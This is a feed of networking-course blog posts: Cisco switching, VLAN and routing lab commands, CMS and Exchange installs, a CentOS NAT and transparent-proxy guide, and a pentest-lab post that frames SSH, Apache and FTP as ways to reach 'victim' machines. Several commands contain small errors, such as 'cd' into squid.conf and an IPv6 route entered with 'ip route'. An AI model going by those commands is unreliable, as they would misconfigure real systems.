Quantcast
Channel: Dan's Blog
Viewing all 59 articles
Browse latest View live

Packet Tracer CCNA 3 Final

$
0
0
{loadposition adposition4}

CCNA 3 Final PT Overview 

I created a Packet Tracer activity for a CCNA 3 class final. I hope this Packet Tracer final exercise will help prepare you for your CCNA 3: VLAN and Switching final, as well as any cumulative lab simulation involving switching and VLANs. The packet tracer involves VLANs, VTP, STP, Inter-VLAN routing, port security and wireless. The instructions for the lab final are included in the Packet Tracer file. You can download it here: CCNA3-dansFinal.zip

 

{loadposition adposition5}Cisco IOS Commands

You need to know the following commands for my Packet Tracer CCNA 3 final (see below). The commands below use sample data only, you will need to fill in your own specific names and numbers based on the requirements of the lab.

switch# show running-config
switch# show vlan
switch# show vtp status
switch# show spanning-tree
switch# configure terminal
switch(config)# line console 0
switch(config-line)# password cisco
switch(config-line)# login
switch(config)# line vty 0 15
switch(config-line)# password cisco
switch(config-line)# login
switch(config)# enable secret class
switch(config)# vlan 5
switch(config-vlan)# name danscourses-vlan
switch(config)# vtp mode server
switch(config)# vtp mode client
switch(config)# vtp domain dansvtpdomain
switch(config)# vtp password danspass
switch(config)# spanning-tree vlan 1-1005 priority 4096
switch(config)# int vlan 99
switch(config-if)# ip address 192.168.99.2 255.255.255.0
switch(config)# ip default-gateway 192.168.99.1
switch(config)# int range fa0/1-3
switch(config-if-range)# switchport mode trunk
switch(config-if-range)# switchport trunk allowed vlan 1-50
{loadposition adposition6}switch(config-if-range)# switchport trunk native vlan 22
switch(config)# int fa0/10
switch(config-if)# switchport mode access
switch(config-if)# switchport access vlan 10
switch(config-if)# switchport port-security
switch(config-if)# switchport port-security maximum 3
switch(config-if)# switchport port-security violation shutdown
switch(config-if)# switchport port-security mac-address sticky
switch# copy run start

router# show running-config
router# show ip route
router# configure terminal
router(config)# line console 0
router(config-line)# password cisco
router(config-line)# login
router(config)# line vty 0 4
router(config-line)# password cisco
router(config-line)# login
router(config)# enable secret class 
router(config)# int fa0/0
router(config-if)# no shutdown
router(config)# int fa0/0.5
router(config-subif)# encapsulation dot1q 5
router(config-subif)# ip address 192.168.5.1 255.255.255.0
router(config)# int fa0/0.44
router(config-subif)# encapsulation dot1q 44 native
router(config-subif)# ip address 192.168.44.1 255.255.255.0
router# copy run start

{loadposition adposition8}


STP

$
0
0
{loadposition adposition4}

Overview

STP or Spanning Tree Protocol is a protocol used on switches that prevents Layer 2 Switching Loops and Layer 2 Broadcast Storms. This is very necessary in large networks that are designed to have redundancy like backup switches and multiple paths across the network. Redundancy is a great thing for a network to have, but it can create physical loops by having more than one physical path or link across the network. When there are redundant links or paths for data to travel, then the data can circulate back around the network repeatedly in a layer 2 switching loop. {loadposition adposition5}This has the potential to effectively shutdown the network, because unlike packets at Layer 3 which have TTL values and a limited lifespan on the network, Layer 2 broadcasts do not have TTL values and will therefore loop endlessly on the network.

STP solves this problem by automatically blocking redundant or duplicate paths (ports) from switch to switch, thus closing the loops. If a path to a switch becomes unavailable, STP can reopen a closed port creating a new path. For this process to work, switches in the network communicate with one another, and share STP messages, called BPDUs, or Bridge Protocol Data Units.

The Root Bridge

The root bridge is the switch that is at the top of the Spanning Tree. The Spanning Tree Algorithm (STA) calculates the costs of all the paths in the network starting from the root bridge. The root bridge is determined by an election process in which the switch with the lowest bridge ID (BID) is elected root bridge. The BID is determined by two factors: 

1. The BID is the lowest bridge priority number plus the VLAN ID, which by default would be 32768 plus the default VLAN 1, would be 32768+1=32769
2. or, if the BIDs on all the switches are identical. The switch with the lowest MAC Address
becomes the root bridge

How to pick the root bridge?

It is a good idea to not leave the root bridge election process up to the mere chance of a switch having the lowest MAC address. Ideally the root bridge should be a robust switch at the center of the network close to resources that users will need access to. The thing to remember is that the root bridge will block ports in order to close off loops, creating paths for traffic to flow. These layer 2 paths need to be as short as possible. For STP to function properly, the end-to-end layer 2 network diameter should be no more than 7 switches. If there are more than 7 switches for data to traverse in the network, then the STP timers will not function correctly and ports could start flapping from forwarding to blocking which would create loops in the network.   

Path Cost

The root bridge calculates which paths are the best paths in the network and which paths are redundant paths, needing to be blocked. This is done by assigning a cost value based on the speed of the switchports. So, if the root bridge is connected to another switch by way of a gigabit port, the cost for that link is assigned a value of a 4, and if that switch is connected to another switch by way of a fast ethernet port then that link is assigned a value of a 19. The entire path cost is 4 + 19 = 23.   

The cost of the link is based on the speed of the port. Here is the list of port costs:
10 Gig = 2,
1 Gig = 4,
100 Mb = 19,
10 Mb = 100 

IOS Commands

switch#show spanning-tree
switch#debug spanning-tree events

Lowering the bridge priority number can change the root bridge election process because the switch with the lowest bridge priority number is elected the root bridge. The default bridge priority number is 32768. In the first command below, you can manually change the bridge priority number. The following two commands automatically set the priority number to a lower than default predefined number

switch(config)#spanning-tree vlan 1 priority <num> 
switch(config)#spanning-tree vlan 1 root primary
switch(config)#spanning-tree vlan 1 root secondary

The following commands allow you to manually change the cost of a port, which is normally based on port speed. This can change which ports, and therefore paths, that the root bridge will elect to block in order to close a loop.

switch(config)#interface fa0/1
switch(config-if)#spanning-tree cost <num>

The following commands change the port priority number which can change which ports, between two designated ports, on the same segment, will be put into a blocking state. To do this, you will need to lower the priority number to a number lower than the default of 128.

switch(config-if)#spanning-tree port-priority <num>
or in Packet Tracer,
switch(config-if)#spanning-tree vlan <num> port-priority <num>
 

Video Tutorials

Click here to download the packet tracer files used in the video: STP1-begin-step4.zip , STP1-begin-step4-STP-OFF.zip

In part 1, I demonstrate how STP prevents Broadcast Storms in large networks with redundant switches

In part 2, I discuss the BID -bridge ID, and the STP root bridge election process

In part 3, I demonstrate how to force the STP root bridge election by changing the bridge priority number

 

Switch & VLAN Packet Tracer Challenge

$
0
0
{loadposition adposition4}

Switch & VLAN Packet Tracer Challenge Overview

A Packet Tracer graded activity. It covers basic Cisco CCNA switch configurations, VLANs, native VLAN, trunk ports, port-security, and setting up secure remote administration with SSH. Great practice for the the Cisco CCNA!

 

Download

The Packet Tracer file is created with Packet Tracer 5.3.3. The Packet Tracer Activity file will track your progress and give you a completion percentage and point total. You can download it here: BasicConfig-VLAN-Trunk-PortSec-SSH-challenge.zip

{loadposition adposition4}

{loadposition adposition5}Activity Instructions

Configure the Network according to the Topology Diagram and Labels.
When you are finished, the PCs on the Student VLAN should be able to ping each other and so should the PCs on the Faculty VLAN. The Admin PC should be able to SSH into S1 and S2 from the command prompt (Eg. PC>ssh -l admin 192.168.99.2)

PCs
1. IP address (see topology),
2. subnet mask (see topology),
3. default gateway address (first usable address in network)

Cisco 2960 Switches: S1 & S2
1. name: S1, S2
2. enable password, md5 encrypted: class
3. domain name: danscourses.com
4. message of the day banner: Unauthorized access is prohibited!
5. console password: cisco
6. vty 0 15 password: cisco
7. Security RSA Key size: 1024
8. SSH version 2
9. vty: ssh only
10. VLAN 10: student
11. VLAN 20: faculty
12. VLAN 99: Mgt
13. Interface VLAN 99: S1-IP address 192.168.99.2, S2-IP address 192.168.99.3
14. Native VLAN 99
15. fa0/1 Trunk
16. fa0/2-0/13 access VLAN 10
17. fa0/14-0/24 access VLAN 20
18. Gi1/1 access VLAN 99
19. Encrypt all passwords
20. Save running-config to startup-config

Cisco 2960 Switch: S1 Only
1. Gi1/1 Switchport Port-Security, sticky, maximum 1 mac address, violation shutdown

{loadposition adposition9}

 

VLANs and Trunks

$
0
0
{loadposition adposition4}

Overview

VLANs - A switches is used to set up a local area network (LAN). A VLAN stands for a virtual local area network. By default, all of the ports on a Cisco switch are part of the same default VLAN (VLAN1) and therefore the same network. A VLAN is a network and a network is a broadcast domain. If you configure various switch ports for separate VLANs, then the devices on those ports will belong to separate VLANs and therefore, will be segmented into separate broadcast domains and networks. This is effectively like dividing a switch into multiple switches. This is cost effective, because instead of having multiple switches, each for a different network, you can have one switch configured for multiple VLANs and you can assign the ports on that switch to belong to whatever VLAN you need the host to belong to.

{loadposition adposition5}VLAN Types

Data VLAN - A data VLAN carries only user data not management data, control data or voice data.

Default VLAN - On a Cisco switch the default VLAN is VLAN1. This means that by default, when a Cisco switch boots up for the first time all the ports are automatically assigned to the default VLAN, VLAN1. You cannot delete or rename VLAN1 but you can assign the ports on the switch to a different VLAN. It is considered best practice to make all of the user ports on the switch belong to a different default VLAN, one other than VLAN1. In this way, control data such as CDP and STP (spanning tree protocol) which are by default carried on VLAN1 would be on a separate VLAN from user data. 

Native VLAN - The native VLAN, if not explicitly configured, will default to the default VLAN, (VLAN1). The Native VLAN is configured for an 802.1Q Trunk port. 802.1Q trunks carry traffic from multiple VLANs by tagging the traffic with VLAN identifiers (Tagged Traffic) which identifies which packets are associated with which VLANs, and they can also carry non VLAN traffic from legacy switches or non 802.1Q compliant switches (Untagged Traffic). The switch will place untagged traffic on the Native VLAN by using a PVID identifier. Native VLAN traffic is not tagged by the switch. It is a best practice to configure the Native VLAN to be different than VLAN1 and to configure it on both ends of the trunk.

Management VLAN - The management VLAN is any VLAN you configure to allow a host to connect to the switch and remotely manage it. The management VLAN will need to be configured with an IP address and subnet mask to allow a manager to connect to the switch by either a web interface (HTTP), Telnet, SSH, or SNMP.

{loadposition adposition6} VLAN ID Ranges

Normal Range

  • 1 to 1005
  • VLAN1 (default), created by default, cannot be deleted
  • VLAN1002-1005 (Token Ring and FDDI default), created by default and cannot be deleted  
  • Stored in the VLAN.dat file in Flash memory

Extended Range

  • 1006 - 4094
  • Extended VLAN range used by ISPs
  • Stored in Running-Config

Trunks - If you have a switch that has ports variously configured on four different VLANs, then that switch has four different networks on it. When you connect that switch to a router or to another switch you will need four ethernet connections or links, one for each VLAN/network. A more cost effective way to connect a switch with multiple VLANs to a router or switch would be to configure a Trunk. A Trunk is a special kind of port configuration which allows multiple VLANs to travel over one link. This way multiple networks can travel over one trunk instead of wasting valuable ports to connect from switch to switch or switch to router. A Cisco trunk by default uses the 802.1Q protocol. The 802.1Q protocol places and strips VLAN tags on packets to identify which VLAN they belong to.

CLI Commands

switch#show vlan
switch#show interfaces trunk

switch(config)#vlan <vlan number>
switch(config-vlan)#name <vlan name>

switch(config)#interface fa0/x
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan <1-4096>

switch(config-if)#switchport mode trunk
switch(config-if)#switchport trunk allowed vlan <1-1005>
switch(config-if)#switchport trunk native vlan <1-1005>


Configuring VLANs and Trunks

In the video tutorial below I demonstrate how to configure VLANs and Trunks on a Cisco switch using Packet Tracer.

{loadposition adposition9} 

 

 

{loadposition adposition8}

 

Subnetting a Subnet with VLSM

$
0
0

{loadposition adposition4}

{loadposition adposition9}

VLSM Overview

Variable Length Subnet Masks (VLSM) are used to create subnetworks of varying sizes. This can be done as long as the IP address spaces of the subnets do not overlap. VLSM gives network designers the ability to not waste public IPv4 addresses by creating networks in sizes they need. {loadposition adposition5}Early dynamic routing protocols were not designed to work with VLSM because they were designed around classful IPv4 addressing. Modern routing protocols are designed to work with VLSM and classless inter-domain routing (CIDR). For the Cisco CCNA exam, you will need to know how to create subnets of varying sizes that do not have overlapping address spaces.

In the video tutorials below, I demonstrate how to solve a typical variable length subnet mask multiple choice question. The type of which you might see on an exam.


Video Tutorials - VLSM





{loadposition adposition4}

{loadposition adposition8} 

Packet Tracer 6 Activity - Basic IPv4 Network

$
0
0
{loadposition adposition4}

Overview

This virtual networking activity involves setting up a basic IPv4 network by connecting two Cisco 1941 routers to two Cisco Catalyst 2960 switches to two PCs. The goal is to variously configure the PCs, switches, and routers with the following information:

{loadposition adposition5}• Basic network device security, by configuring access port passwords, banner message of the day and encryption on the routers and switches (see the network diagram in Packet Tracer),
• Interface IP address, subnet mask, and gateway addresses (see the network diagram in Packet Tracer),
• A static default route/gateway of last resort for the routers,
• Follow the instructions in the network diagram for additional required configurations

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. In the end, you should be able to ping from PCA to PCB

{loadposition adposition4}

Download

BasicIPv4NetworkConfiguration.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - Only Read Below if you are stuck

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#banner motd "No unauthorized access allowed!"
R1(config)#enable secret class
R1(config)#service password-encryption
{loadposition adposition5}R1(config)#line console 0
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#line vty 0 4
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#exit
R1(config)#interface g0/0
R1(config-if)#ip address 192.168.5.1 255.255.255.0
R1(config-if)#description toR2
R1(config-if)#no shut
R1(config)#interface g0/1
R1(config-if)#ip address 192.168.0.1 255.255.255.0
R1(config-if)#description toLAN
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ip route 0.0.0.0 0.0.0.0 192.168.5.2
R1#copy running-config startup-config
R1#show running-config
R1#show ip route
R1#show ip int brief

switch>enable
switch#configure terminal
switch(config)#hostname S1
S1(config)#banner motd "No unauthorized access allowed!"
S1(config)#enable secret class
S1(config)#service password-encryption
S1(config)#line console 0
S1(config-line)#password cisco
S1(config-line)#login
S1(config-line)#line vty 0 14
S1(config-line)#password cisco
S1(config-line)#login
S1(config-line)#exit
S1(config)#interface vlan 1
S1(config-if)#ip address 192.168.0.2
S1(config-if)#exit
S1(config)#ip default-gateway 192.168.0.1

S1(config)#exit
S1#copy running-config startup-config
S1#show running-config

 

{loadposition adposition8}


Packet Tracer 6 Activity - Basic IPv6 Network

$
0
0

{loadposition adposition4}

Overview

This Packet Tracer 6.0.1 networking activity involves setting up a basic IPv6 network by interconnecting two Cisco 1941 routers, two Cisco Catalyst 2960 switches, and two PCs. All of the devices in the network will need to be configured with IPv6 addressing in order to communicate. The goal is to configure the routers and PCs with the following information:

{loadposition adposition5}• On the routers configure basic security with hostnames, console and vty passwords, banner message of the day, and enable password encryption (see the network diagram in Packet Tracer),
• On the routers configure link-local and global unicast IPv6 addresses with network prefix lengths (see the network diagram),
• On the routers configure static IPv6 default routes (see the network diagram),
• On the PCs configure static IPv6 addresses with network prefix lengths, and a gateway address (see the network diagram),
• Follow the instructions in the network diagram for additional required configurations

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PCB from PCA)

 

{loadposition adposition4}

Download

BasicIPv6NetworkConfiguration.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - Only Read Below if you are stuck

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#banner motd "No unauthorized access allowed!"
R1(config)#enable secret class
R1(config)#service password-encryption
R1(config)#line console 0
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#line vty 0 4
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#exit
R1(config)#ipv6 unicast-routing
R1(config)#interface g0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:ACAD:2::1/64
R1(config-if)#description toR2
R1(config-if)#no shut
R1(config)#interface g0/1
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:ACAD:1::1/64
R1(config-if)#description toLAN
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ip route ::/0 2001:DB8:ACAD:2::2
R1#copy running-config startup-config
R1#show running-config
R1#show ipv6 route
R1#show ipv6 int brief

 

{loadposition adposition8}


 

Installing Joomla and WordPress

$
0
0
{loadposition adposition4}

Overview

Now we need to get full installations of Joomla and WordPress, which you can download from their websites. If you are running Windows you will want to download the zipped versions of Joomla and WordPress. {loadposition adposition5}Once you have download the zipped packages, you will need to extract or unzip them by RIGHT+Clicking on them and selecting 'Extract all'. Once extracted, you will see that the both the Joomla and WordPress frameworks consist of files and folders within once central folder. The files types consist of php, css, html, javascript, xml, jpg, and png files, etc.. A Joomla and WordPress website starts with that central 'folder' and all of the folders and files contained therein.

A Joomla and WordPress website is essentially a folder with all of the Joomla or WordPress files and folders located inside, connect it to a MySQL database and you have a Joomla or WordPress website. When you download Joomla or WordPress, you are downloading the whole thing (minus the database) in one compressed folder, which you then have to decompress (unzip). Once the folder is unzipped, you can rename the folder to anything you like to differentiate it from other sites (folders) on your webserver. Each 'website' is another instance of this complete folder or directory. In computer lingo, the word "directory" is often substituted or preferred over the word folder. Repeating this concept, if you decided to host multiple Joomla and WordPress websites on your server, each website will need its own uniquely named directory containing all of the files and directories within, as well as a MySQL database to go with it. 

Materials

You will need to go to the Joomla website and download two version of Joomla. I recommend downloading the zip versions of Joomla 1.5.x, a classic older version, and Joomla 2.5.x (the x signifies the latest sub version.

You will also need to go to visit WordPress website and download the latest zip version of WordPress currently it is WordPress 3.4.2.

 

{loadposition adposition9}

Video Tutorials

    This series of video tutorials will walk you through installing Joomla 1.5, Joomla 2.5, and WordPress 3.4.2. The goal is to set up three development websites on your local computer in order to begin learning how to use Joomla and WordPress.

     

    Preparing to install three websites in WAMPserver

{loadposition adposition4}

Creating the databases 

 

Install Joomla 1.5.x

 

Install Joomla 2.5.x

 

Install WordPress 3.4.2 

{loadposition adposition8}

 


Create a User Login Module in Joomla 1.5

$
0
0
{loadposition adposition4}

Video Tutorials

In this video tutorial, I create a front-end user login module in Joomla 1.5

 

DHCP and NAT

$
0
0

{loadposition adposition4}

{loadposition adposition9}

Overview

In the tutorials below, I configure DHCP and NAT and demonstrate its function using Packet Tracer.

Video Tutorials

Configure the Cisco router to function as a DHCP server

 

{loadposition adposition8}

 

Configure the Cisco router to relay DHCP requests to the DHCP server using an ip helper-address

Configure the router as a DHCP relay agent - Take 2

Network Address Translation (NAT) - Part 1

 

{loadposition adposition8}

 

Network Address Translation (NAT) - Part2

Network Address Translation (NAT) - Part3

 

{loadposition adposition4}

 

Network Address Translation (NAT) - Part4

{loadposition adposition9} 

Run Services (SSH, FTPD, HTTPD)

$
0
0
{loadposition adposition4}

Introduction

If we are going to penetrate victim computers (in the test lab) and establish communication to and from those clients so that we may execute commands and transfer files we will need some network services like SSH and FTP.

{loadposition adposition5}SSH 

SSH or secure shell allows you to open a secure terminal connection to a remote host, or simply to login to a remote computer in order to execute commands. This is done through a client server model where a SSH client connects to a SSH server. This type of connection is typically used to securely exchange encrypted data with a remote host, with the data being commands but can even be files using SFTP and SCP which utilize the SSH protocol. SSH was developed to replace non secure remote connection protocols like rlogin, telnet and rsh. SSH typically runs on port 22. SSH should be installed by default in BackTrack.

Manual pages on SSH and the SSHDaemon
   #man ssh
   #man sshd

Generate the secure keys for the host service
    #sshd-generate
   or
    #ssh-keygen

Start the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh start

Check to see if SSH is listening on Port 22
   #netstat -antp

Since you are now running an SSH server, you could download PuTTY to your Windows client and SSH into your BackTrack machine. Try this, was it successful? If not, where might the block be? Are you VPN'd? Are there any firewalls on the client or on an intermediary network device?

Stop the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh stop

If you want instructions on how to install SSHD in Ubuntu go here

{loadposition adposition10}

HTTPD (Apache)

Apache webserver is the most widely used webserver on the internet. From a network penetration perspective a webserver could be used an exploitation tool serving up malicious files and scripts that will execute against a victims browser and computer. It could also be used as a way of transferring files to a victim machine once access has already been accomplished. Webservers by their very public nature are great way for a hacker getting information or reconnaissance about a company or target. Apache webserver is usually run on port 80.

Start the Apache2 server using the scripts in the init.d directory
  #/etc/init.d/apache2 start

Verify if Apache is listening on Port 80
   #netstat -antp

Your server's accessible web directory is located in /var/www/ and is where you would put your webpages.

If you want instructions on how to install HTTPD Apache in Ubuntu go here

{loadposition adposition9}

FTPD

FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21 and transfers files on port 20.

The steps to setting up pure-FTPd:

Installation (pure-ftpd is installed by default in BackTrack but in case you are using another Linux distribution)
   #apt-get install pure-ftpd
   #yum install pure-ftpd

Configuration to add a FTP user and setup an FTP directory
   #groupadd ftpgroup
   #useradd -g ftpgroup -d /dev/null -s /etc ftpuser
   #pure-pw useradd <your ftp username> -u ftpuser -d /home/ftp/pub/<your ftp username>
     You will be prompted to input a password twice   
   #pure-pw mkdb   
   #cd /etc/pure-ftpd/auth
   #ln -s ../conf/PureDB 60pdb
   #mkdir /home/ftp
   #mkdir /home/ftp/pub
   #mkdir /home/ftp/pub/<your ftp username>
   #chown -R ftpuser:ftpgroup /home/ftp/pub/<your ftp username>
   #/etc/init.d/pure-ftpd restart

Test you install of Pure-FTPd by FTPing to your loopback ip address
   #ftp 127.0.0.1
   key in your <ftp username>
   key in your <ftp password>

{loadposition adposition4}

{loadposition adposition8}

 

Install Server 2008 R2 and Exchange Server 2010

$
0
0

{loadposition adposition4}

Overview

{loadposition adposition5}Installing Microsoft Exchange Server can be a daunting task. There are some pre-installation decisions and preparations to be made. You will need to check to see if your version of Windows Server 2003 (32bit or 64bit), 2008, or 2008R2 is compatible with the version of Exchange Server (2007 or 2010) that you are planning to install. There are also a lot of options on how you can run your Exchange install, either using the GUI Setup Wizard, a command line install, or a scripted install.

By default Exchange Server 2007 and 2010 are 64 bit. Although you can install 2007 in 32bit for a non-production test environment. Here are my recommendations of what could work for you in the lab or at home:

  • Server 2008 R2 and Exchange Server 2010 (64 bit) - The newest architecture is recommended
  • Server 2008 and Exchange Server2007 (64 bit)
  • Server 2003 (64 bit) and Exchange Server 2007 (64bit)
  • Server 2003 (32 bit) and Exchange Server 2007 (32bit) - If you can only run 32 bit

{loadposition adposition6}Hardware Requirements

Exchange Server 2007/2010

How many servers will Exchange Server roles be installed on 1, 2, 3 or 4 separate servers?
64 bit architecture (Yes please)
2 Gig RAM (min)
Enough hard disc storage space to support your users. In order to achieve this you could use:
   - a local hard drive or drives
   - a SAN (storage area network) storage system
   - a IP SCSI NAS (network-attached storage)

Pre-Installation Checklist

For an install of Exchange Server 2007/2010 to work you will need the following things installed or added to your Windows Server platform. (3, 4, and 5 below are installed by default when installing Server 2008 or using the Exchange setup wizard):

  1. Active Directory -  (add role)
  2. DNS - (add role)
  3. The server will need to be a Domain Controller (dcpromo) and Global Catalog Server
  4. .NET framework
  5. Microsoft Management Console (MMC)
  6. Windows Power Shell
  7. Microsoft IIS - (add role)
  8. WWW Publishing Services - (add role):
          You may need to specify many of the IIS services (like IIS 6.0 and XML 6.0) and make sure the WWW server is running
  9. Net.Tcp Port Sharing Service will need to be set to automatic (Go to Start > Run > services.msc > and look for Net.Tcp Port Sharing)

{loadposition adposition7}The Exchange Server 2007/2010 setup wizard makes the process a lot easier. The wizard will run through a checklist of items to make sure your system meets the necessary requirements. If your computer does not meet the requirements you will be prompted to search and install the necessary tools that the installation requires. 

Exchange Server Mail Roles

When installing Exchange Server you need to decide which specific mail roles or servers you will need. There are five different servers within Exchange Server that you can install:

Mailbox Server
Client Access Server
Hub Transport Server
Unified Messaging Server
Edge Transport Server

In this class you will need to install the Mailbox, Client Access and Hub Transport servers. The Unified Messaging Server and Edge Transport Servers are typically installed on separate servers and are not needed for a small test purposes installation.

{loadposition adposition4}

 

Video Tutorials 

Install Active Directory, DNS and IIS and promote the server to a DC and GCS

Install Exchange Server 2010


{loadposition adposition8}

 

Route, NAT, and Transparent Proxy, with CentOS Linux

$
0
0
{loadposition adposition4}

{loadposition adposition5}Overview

It is useful to protect your network, by filtering web requests and other types of traffic, a proxy server is designed to do this. You can create a Linux proxy server using Squid and SquidGuard, and configure network settings on your user's browsers to access the proxy server which will then apply rules that will filter the requests. However, that can be bypassed by the host computer.

A stronger alternative is to create a transparent proxy server and configure your router to forward all web related requests to the proxy server, that way your network hosts are forced to go through the transparent proxy. A potential problem with that scenario is that you need to have a fairly decent router, which can forward interior traffic on a specified port, to the proxy server on the local area network. A third alternative is to make your transparent proxy server also handle routing, NAT, DHCP, and DNS. It would seem like that would be a huge undertaking, but it can actually be done fairly quickly, using a computer and a distribution of Linux.


 

 


Lab Outline

{loadposition adposition6}To create a Linux proxy server that also functions as a router and more, it is recommended to use a server distribution of Linux like CentOS Linux, which is the freely distributed server equivalent to RedHat Enterprise Linux. Along with Debian ,CentOS is one the most popular server distributions of Linux available. For this lab, we download and burn CentOS 6.2, i386 (32bit) or x86_64 (64bit), ISO DVDs Parts 1 and 2. Pick a CentOS 6.2 mirror with Direct DVD downloads and download the DVD iso files, to burn as installation DVDs. 

Once you have the CentOS installation DVD iso files downloaded and burned to DVD you need to install the operating system to a computer. You can choose to install to an actual computer or to a virtual computer (virtual machine). In order to do this lab from home, and if you do not have a lot of extra computers lying around, I recommend doing the whole project virtually through the use of virtual machines. For a virtualization platform, I recommend downloading either VMware Player or Virtualbox.

If you decide to follow along with the video tutorials and set up a CentOS server virtual machine and convert it into a router, remember that the IP addressing scheme will need to be modified to work with your personal network. Just because my wireless network uses a 192.168.2.0 /24 local addressing scheme does not mean that yours does also, in fact your network most likely uses a different scheme like 192.168.1.0 /24.


Network diagram of a CentOS proxy server and router using virtual machines


 

In the lab at the college we installed CentOS to actual physical computers. Normally, I recommend using computers with two network interface cards (NICs) installed, but the computers we had available to us had only one network interface card (NIC). This posed a challenge since the traffic would need to flow through the computers, from one network to another, implying the need for two network interface cards. We fixed this problem by configuring VLANs, and assigning IP addresses to subinterfaces on the computer's single NIC. We then connected to a switchport configured for trunking with the same VLANs as we created on the computer.   

Network diagram of a CentOS proxy server-router implementation using a lab computer
with only one network interface card (NIC) and a switch configured with VLANs and trunks

 

 

Lab Steps Overview (virtualized machines or physical machines)

a. Understand the benefits of a transparent proxy and a Linux server that can also route, NAT, etc. Plan and diagram your lab. See video tutorial part 1 below.

b. Download CentOS installation ISO files, i386 or x86_64, DVDs. See Lab Outline above and video tutorial part 2 below.

c. To do this lab on a physical computers you will need one computer for the CentOS server, preferably with two NICs, but one is okay too, and another computer for a test LAN host. 

To do this lab virtually using a virtual platform like VMware or Virtualbox, first create a new virtual machine for the the Linux operating system. You will probably need to choose RedHat Enterprise 32 bit or 64 bit and walk through all the settings. At the end, configure your virtual CD/DVD to boot to the CentOS installation ISO file that you downloaded. Make sure to add or enable to virtual network interfaces (NICs). Set the first NIC to Bridged Networking mode and the second NIC to NAT mode (then once it is saved change it to again to LAN segment mode), in Virtualbox save the second NIC to Interior Network mode. See video tutorial part 2 below.

d. Configure network addressing on your server's two network interfaces as well as your test host's network addressing. See video tutorial part 3 below.

e. Configure routing and NATing using iptables on your server. See video tutorial part 4 below.

f. Install and configure Squid as a transparent proxy server. Configure iptables to port-forward web traffic to the server on port 3128 (Squid). See video tutorial part 5 below.

g. Secure your server by configuring iptables to accept and reject specific types of traffic. Install and configure DHCP server on your CentOS server in order to hand out IP addresses on your local network. See video tutorial part 6 below.


Lab Command Steps

Here is a list of the commands used in this lab project:

1. If you are working in my lab or have a computer with only one network card (NIC) jump to step 2. If you are using a virtual or physical computer with two NICs (e.g. eth0 and eth1) you will  need to configure each NIC with the command below, then jump to step 6. You can dynamically receive an IP address through DHCP coming from your router/gateway on eth0, click on the network manager in the upper right of the task bar and click "auto ethernet" or just click on "eth0" to activate DHCP. Then you will need to manually configure the second NIC using an ifconfig command from the terminal (e.g. ifconfig eth1 192.168.111.1) you will need to have root access to do this. After you have activated DHCP on eth0 and manually configured eth1 use the ifconfig command to check your interface ip addresses to see that you have an address for eth0 and eth1. You are now ready to jump to step 6.
su - 
ifconfig eth1 192.168.111.1
ifconfig

2. If you are working in my lab or you have a computer with only one network interface card (NIC), you will need to configure trunking and two VLANs (e.g. 110, 111) on the CentOS Linux server (for students with a physical computer with only one NIC)
vconfig add eth0 110 (in my college lab we use VLAN110 for the 192.168.11.x network)
vconfig add eth0 111 

vconfig rem eth0 111 (removes a VLAN trunk)

3. To configure sub-interfaces in order to assign an IP address to each VLAN, in our classroom lab we use VLAN110 for the 192.168.11.0 network.
ifconfig eth0.110 192.168.11.xxx
ifconfig eth0.111 192.168.111.xxx 

4. To configure a default gateway/route
route add default gw 192.168.11.1

5. To configure DNS servers
echo "nameserver 4.2.2.2" > /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf

6. To add kernel support for IP forwarding (routing) we set a flag with the following command
sysctl -w net.ipv4.ip_forward=1

7. To set up NATing we can configure the iptables NAT table for masquerading.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  (assuming eth0 is the outside interface)
or
iptables -t nat -A POSTROUTING -o eth0.110 -j MASQUERADE  (assuming the eth0.110 sub-interface is the outside interface) 

8. To install the Squid proxy server
yum install squid
cd /etc/squid/squid.conf

{loadposition adposition7}9. Edit the the squid.conf file and change the following line to enable transparent proxy mode:
http_port 3128
to
http_port 3128 intercept

10. Issuing one of the following commands will restart the Squid service or reload the configuration file
service squid restart
service squid reload

11. Add an entry to iptables NAT table to port-forward inbound traffic on the inside interface (LAN side) to the Squid server on port 3128 (assuming eth1 is the inside interface with the IP address 192.168.11.1)

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to (cont.) 192.168.111.1:3128

12. To get routing and forwarding to work correctly you will also need to remove some statements from the iptables tables that reject traffic. The following lines will remove reject statements from the filter INPUT iptable chain and the FORWARD iptable chain.
iptables -t filter -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -t filter -D FORWARD -j REJECT --reject-with icmp-host-prohibited

From first glance, it seems that there is a rule in the iptables INPUT chain (third line) that accepts any protocol from any source to any destination. The following statement would delete the third line of the filter table INPUT chain, the "accept any anywhere anywhere" line: <iptables -t filter -D INPUT 3> but do not use it, because as it turns out, that particular line has information that does not appear in the output of an <iptables -L> command. Try using the following command and then compare it to the results of the <iptables -L> command:
iptables-save

